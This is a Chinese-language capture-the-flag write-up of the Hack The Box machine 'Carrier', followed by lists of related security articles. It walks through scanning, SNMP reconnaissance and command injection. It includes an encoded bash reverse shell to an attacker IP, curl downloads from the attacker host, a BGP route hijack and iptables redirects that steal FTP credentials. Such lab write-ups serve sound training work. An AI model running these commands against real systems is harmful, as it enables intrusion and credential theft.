出品｜MS08067实验室（www.ms08067.com)

本文作者：大方子（Ms08067实验室核心成员）

Hack The Box是一个CTF挑战靶机平台，在线渗透测试平台。它能帮助你提升渗透测试技能和黑盒测试技能，它包含了一些不断更新的挑战，其中有模拟真实世界场景，也有倾向于CTF风格的挑战。

https://www.hackthebox.eu/

平台上有很多靶机，从易到难，黑客每入侵一台机器都会获得相应积分，通过积分排名设有名人堂。今天要实验的是靶机Carrier。

目标靶机IP：10.10.10.105

本机IP：10.10.13.133

首先利用Nmap对目标靶机进行信息收集

nmap -sC -F -sV 10.10.10.105

-sC：通过默认脚本进行扫描

-sV：扫描目标主机端口上运行软件的版本

-F：扫描100个最有可能开放的端口

显示靶机开放了21，22，80，3306端口，但是21，3306端口被过滤了。22端口是SSH需要登陆，我们先从80端口开始看看能不能得到有用的信息

先打开网页，是一个登陆页面，有2个Error提示45007，45009，去Google查询类似的关键词发现没有什么可用信息，应该是自定义的WEB框架，

我们用gobuster来进行目录爆破

gobuster  -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q

先看下tools

/tools:

点进去显示“许可过期，正在退出”

看下doc

/doc：

一个网络架构图还有一个是错误代码描述的PDF，根据刚刚网页提示的错误代码我们查下对应的解释

Error 4005：守护进程没有响应

Error 4009：配置中没有设置默认的用户名和密码（查看机箱序列号）

看下/debug

没有什么特别有用的信息

根据那种图可能还有别的设备，这样我想起了snmp服务

所以我们扫下靶机UDP的端口看看有没有什么有用的信息

nmap -sU 10.10.10.105

果然目标机器是有开启snmp，那么我们用snmpwalk来进行弱口令利用

snmpwalk -v 1 -c public 10.10.10.105

这个NET_45JDX23可能就是所谓的序列号

我们回到登陆进行登陆。

Username:尝试常见的默认用户名:admin, root

Password: NET_45JDX23

页面显示我们的凭证是无效的

我们进入Tickets

通过这条信息 我们知道了3个网段（大概就是刚刚那个网络架构图），还有一个FTP：10.120.15.0/24

然后我们在点Diagnosticd，提示我们凭证无效，但是可以使用检查功能

点下Verify status

这个部分很像是远程命令执行。

我们用BURP抓包看下信息

Check用base64转换下

很明显这个quagga就是上面输出信息的一部分，查找相关资料，发现这是一款路由器软件

那么我们设置对check这个参数进行攻击，我们把root的base64编码写进去

返回信息如下

那么我们在试着输入 root；echo hello

如图发现我们是可以用;进行多语句的执行，那么我们用bash反弹一个shell

现在用kali监听下9001

然后转换下编码

这里输出cm9vdDtiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEzLjEzMy85MDAxIDA+JjE=

需要注意的是需要把里面的+和=进入URL编码转换才行要不然会出错

这样我们就得到一个shell了

这样我们就可以得到user的flag了

接下来就是获得根ROOT的权限

从之前的信息我们了解到有一台FTP服务器：10.120.15.0/24

我们试着ping 10.120.15.1看看能不能ping通

我们需要在靶机上进行扫描，当然你可以用msf添加路由的方式扫描，这里我用另一个种方法把nmap的二进制静态执行文件上传到靶机进行扫描

Github：https://github.com/andrew-d/static-binaries

然后我们用python的SimpleHTTPServer模块建立服务然后靶机去下载这个文件

然后再靶机分别输入如下命令

curl http://10.10.13.133:8000/nmap -o nmap

chmod +x nmap

然后我们执行

./nmap -p 21 10.120.15.0/24

发现没有探测到，可能是目标禁止ICMP数据包

那么我们加个-Pn参数，同时把结果导出

./nmap -Pn -vvv -p 21 10.120.15.0/24  --open

-Pn：不进行ping直接扫描

-vvv：显示详细过程

--open：只显示端口open状态信息

我们发现 10.120.15.10是开放21端口的

然后我们尝试下FTP匿名登陆，登陆的时候可能不会有回显，需要自己打

无法执行，之前那个ticks也说这个FTP出现了问题。

我们需要通过劫持BGP欺骗AS200将数据传输给我们的靶机，然后开启假的FTP服务，之前的信息有显示到有人会定期访问这个FTP，这样我们就可以窃取到凭证

现在的情况大概就是图上这个样子

我们在终端分别输入

vtysh  （quagga的命令）

configure terminal（进入配置模式）

do show run （显示配置信息）

我们需要增加一个network就是把刚刚FTP的那个网段加进来

这里我直接编辑/etc/ quagga下的bgpd.conf文件内容也就上面显示的内容

我们在自己的kali上编辑下内容在里面加一条10.120.15.0/25

然后用python的SimpleHTTPServer服务上传到靶机里面去跟nmap一样

把之前的文件重命名，然后把我们的文件下载下来

curl http://10.10.13.133:8000/bgpd.conf -o bgpd.con

然后在iptales上添加记录并重启quagga服务

iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.14.65:21

iptables -t nat -A POSTROUTING -j MASQUERADE

service quagga restart

然后我们在下载一个假的ftp监听21端口来得到凭证

Github：https://github.com/b1ngda0/FtpServicePython/

不久后就能得到账号密码

root:BGPtelc0rout1ng

然后ssh登陆并得到root flag

转载请联系作者并注明出处！

Ms08067安全实验室专注于网络安全知识的普及和培训。团队已出版《Web安全攻防：渗透测试实战指南》，《内网安全攻防：渗透测试实战指南》，《Python安全攻防：渗透测试实战指南》，《Java代码安全审计（入门篇）》等书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货，从零开始、以实战落地为主，致力于做一个实用的干货分享型公众号。

官方网站：https://www.ms08067.com/

扫描下方二维码加入实验室VIP社区

加入后邀请加入内部VIP群，内部微信群永久有效！

  

  

【HTB靶场系列】靶机Carrier的渗透测试的更多相关文章

1. Powershell渗透测试系列–进阶篇

   原文来自:https://bbs.ichunqiu.com/thread-41561-1-1.html i春秋作家:anyedt 0×00 引言 经过基础篇的学习我们已经对powershell有了一个 ...

2. DVWA渗透测试系列 一 （DVWA环境配置）

   DVWA介绍: DVWA是一个渗透测试靶机系统. DVWA具有十个模块:分别是 Brute Force(暴力破解).Command Injection(命令行注入).CSRF(跨站请求伪造).File ...

3. Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装

   Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装  一．配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装Virt ...

4. 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注

   前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...

5. BTRsys1~2系列靶机渗透

   BTRsys系列靶机渗透 BTRsys1 端口发现加目录扫描. 发现目录:http://192.168.114.161/login.php 尝试弱密码失败,查看源代码. <script type ...

6. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

   第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

7. Kali Linux Web渗透测试手册(第二版) - 1.0 - 渗透测试环境搭建

   一．配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux ...

8. chapter1 渗透测试与metasploit

   网络对抗技术课程学习 chapter1 渗透测试与metasploit 一.读书笔记 二.渗透测试 通过模拟恶意攻击者的技术与方法进行攻击,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响 ...

9. Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击

   Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击 文/玄魂 目录 Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击................... ...

10. Metasploit渗透测试魔鬼训练营

    首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法 ...

随机推荐

1. iscoll制作顶部可以左右滑动的tab

   <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name ...

2. pimpl idiom vs. bridge design pattern

   http://stackoverflow.com/questions/2346163/pimpl-idiom-vs-bridge-design-pattern

3. How to setup Wicket Examples in Eclipse

   Wicket examples is a good place to learn Apache Wicket by examples, and a must reference site for ne ...

4. POJ1118 Lining Up

   快弄死我了 最后的原因是abs和fabs的区别... 说点收获:1.cmp函数返回的是int,所以不要直接返回double相减的结果2.define inf 1e9和eps 1e-93.在整数相除得到 ...

5. Spark配置&amp;启动脚本分析

   本文档基于Spark2.0,对spark启动脚本进行分析. date:2016/8/3 author:wangxl Spark配置&启动脚本分析 我们主要关注3类文件,配置文件,启动脚本文件以 ...

6. Linux新手随手笔记1.1

   ifconfig   查询网卡信息 分别是网卡名称,物理IP地址,MAC地址,RX收到数据包大小,TX发送数据包大小 # uname # uname -a 查看内核版本号 # hostname 查看主 ...

7. Your local changes to the following files would be overwritten by merge:

   在服务器改动之后,用sourcetree提交会产生冲突,解决办法:

8. cmake 基本命令

   1 # CMake 最低版本号要求cmake_minimum_required (VERSION 2.8) 2 项目信息project (Demo2) 3 aux_source_directory 查 ...

9. 文本处理三剑客之 grep/egrep

   grep:文本过滤工具 支持BRE egrep: 支持ERE fgrep: 不支持正则 作用:根据用户指定的“模式”,对目标文本逐行进行匹配检查,打印匹配到的行 模式:由正则表达式字符及文本字符所编写 ...

10. python selenium ---键盘事件

    转自:http://www.cnblogs.com/fnng/p/3258946.html 本节重点: l 键盘按键用法 l 键盘组合键用法 l send_keys() 输入中文运行报错问题 键盘按键 ...